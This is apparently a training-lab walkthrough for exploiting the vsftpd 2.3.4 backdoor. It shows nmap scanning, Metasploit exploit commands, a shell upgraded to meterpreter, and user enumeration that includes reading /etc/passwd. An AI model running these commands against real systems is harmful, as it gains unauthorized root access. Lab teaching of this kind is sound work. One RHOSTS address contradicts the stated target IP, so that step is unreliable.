Solution

Step 1: Open the lab link to access the Kali terminal instance

Step 2: Identify the target IP address

To begin with you will need to identify the target system's IP address, this can be done by
running the following command:

Command:

ifconfig

As shown in the following screenshot, locate the IP address associated with theeth1interface, the
target IP address is the next IP within the subnet.

In this case the Kali Linux IP is 192.72.78.2 so the target IP will be 192.72.78.3.

Note: In your case the IP address will be different, ensure that you substitute the IP in your lab
environment with the one shown below.

Step 3: Port scanning with Nmap

Now that we have identified the target IP address, we can perform a port scan to identify
vulnerable services running on the target system. This can be done by running the following
command:

Command:
nmap -sV 192.72.78.3

The Nmap scan reveals that the target has an FTP server running on port 21. The version column
from the Nmap scan reveals that the FTP server isvsftpd 2.3.4. This version ofvsftpdis
vulnerable to a backdoor command execution vulnerability and can be exploited with a
Metasploit module.
Step 4: Gaining access

Now that we have identified the vulnerable service running on the target, we can start the
Metasploit Framework console (msfconsole) by running the following command:

Command:

msfconsole

We can now load the appropriate exploit module by running the following command:
Command:

use exploit/unix/ftp/vsftpd_234_backdoor

We will now need to configure the module options, more specifically the target IP address, this
can be done by running the following command:
Command:

set RHOSTS 192.72.28.3

We can now run the module by running the following command:

Command:

exploit

As shown in the following screenshot, if the exploit runs successfully, we will be provided with a
command shell session withrootprivileges on the target system.

Because the command shell session is non-interactive, we will need to spawn a bash session, this
can be done by running the following command:

Command:

/bin/bash -i
You can also obtain a meterpreter session on the target system by upgrading the command shell
session. This can be done by running the following commands:

Command:

CTRL + Z

Command:

sessions -u 1

As shown in the preceding screenshot, upgrading the command shell to a meterpreter session is
successful and we can now interact with the target system via the meterpreter session with
a SESSION ID of 2.

Command:

sessions 2

Step 5: Enumerating users & groups

Now that we have gained access to the target system and have obtained a meterpreter session,
we can begin enumerating the users & groups on the target system.

The first piece of information that we can enumerate is the current user we have access to, this
can be done by running the following meterpreter command:
Command:

getuid

As shown in the following screenshot, we currently have access to the target system as
therootuser.

We can also obtain the same information manually by running the following command in a
command shell session:

Command:

shell

Command:

/bin/bash -i

Command:

whoami

Now that we have identified the user account we have access to, we can enumerate the groups
that the root user is a prt of, this can be done by running the following command:

Command:

groups root
We can get a list of other user and service accounts on the Linux system by running the
following command:

Command:

cat /etc/passwd

We can enumerate a list og groups present on the system by running the following command:

Command:

groups
We can view the users that are currently logged in by running the following command:

Command:

who

As shown in the preceding screenshot, no users are currently logged on via a console or remotely
via SSH.

We can also get a list of users of have recently logged in to the system by running the following
command:

Command:

lastlog